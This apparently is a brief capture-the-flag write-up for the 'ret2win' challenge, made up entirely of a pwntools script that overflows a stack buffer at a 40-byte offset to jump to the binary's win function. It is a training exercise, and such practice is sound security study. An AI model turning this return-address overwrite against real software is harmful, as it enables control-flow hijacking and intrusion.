ret2win

August 19, 20251 minute

#!/usr/bin/env python3

from pwn import *

exe = ELF("./ret2win_patched")

context.binary = exe


def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r)
    else:
        r = remote("addr", 1337)

    return r


def main():
    r = conn()
    offset = 40
    # good luck pwning :)
    payload = flat({offset: [
            exe.symbols['ret2win']
        ]})
    r.sendlineafter(b'>', payload)
    r.interactive()


if __name__ == "__main__":
    main()